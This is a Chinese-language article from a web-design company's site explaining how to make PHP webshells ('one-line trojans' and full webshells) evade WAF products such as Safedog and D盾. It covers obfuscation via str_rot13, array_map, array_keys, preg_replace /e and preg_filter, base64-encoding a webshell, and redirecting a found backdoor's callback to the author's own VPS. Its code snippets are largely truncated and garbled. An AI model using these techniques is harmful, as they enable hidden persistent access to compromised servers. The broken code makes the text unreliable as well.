重庆分公司,新征程启航
为企业提供网站建设、域名注册、服务器等服务
本篇内容主要讲解“Webshell免杀怎么实现”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“Webshell免杀怎么实现”吧!
为上海等地区用户提供了全套网页设计制作服务,及上海网站建设行业解决方案。主营业务为成都网站设计、网站建设、上海网站设计,以传统方式定制建设网站,并提供域名空间备案等一条龙服务,秉承以专业、用心的态度为用户提供真诚的服务。我们深信只要达到每一位用户的要求,就会得到认可,从而选择与我们长期合作。这样,我们也可以走得更远!
在渗透测试中最常用的就是一句话后门(小马)和中国菜刀的配合。如果出现某种WAF防护,就寻找一个免杀的大马挂马。
最常见的php一句话木马
这个一句话木马由两部分组成,eval用来执行接收的代码。$_POST['x']来接收数值。
本着这个原则,尝试改写一句话木马绕过WAF。
搜集了几个常用的php函数
执行代码的eval、assert、preg_replace
接收数据的$_POST、$_GET、$_REQUEST
str_rot13函数来替代assert。该函数对字符串执行ROT13编码。ROT13编码就是把每个字母在字母表中移动13位。
测试发现无法绕过安全狗。修改一下。
即可绕过安全狗。
xiaoma($_REQUEST['x']); ?>
再次修改,加了explode函数分割字符串,class封装类。可绕过D盾。
array_map() 函数将函数作用到数组中的每个值上,并返回一个新的数组。
即可绕过安全狗。
array_key() 函数也是返回包含数组的一个新数组。
"3"); $b=array_keys($a)[0]; eval($b); ?>
索引数组变化为关联数组。
即可绕过安全狗、D盾。
用来正则匹配的一个函数。
/e用来当做php代码解析。5.6版本以下实用。
测试可绕过安全狗和D盾。
根据preg_replace修改为preg_filter函数,也是用来执行正则的匹配替换。
也可以绕过D盾、安全狗。
也可以绕过D盾、安全狗。
正好自己手里有一个php大马。但不免杀。尝试将源码base64加密后修改为php免杀大马。
将大马eval函数变为exit或者echo。burp抓取源代码。
将源代码拷贝下来,审计发现给源码存在一处后门。
base64解码一下
哦!!!真是可以。
将该base64地址修改为自己的vps地址。嘻嘻。
那现在只要eval函数可以执行这传base64的字符串就可以啦。
WAF对base64_encode、base64_decode查杀非常严格。
不断搜索、修改、编写,最终成功。
dama(); ?>
直接将php大马源码放在code处。即可。
也可以改造php免杀一句话木马。
比如这款
访问一下。
查看vps是否接收到。
到此,相信大家对“Webshell免杀怎么实现”有了更深的了解,不妨来实际操作一番吧!这里是创新互联网站,更多相关内容可以进入相关频道进行查询,关注我们,继续学习!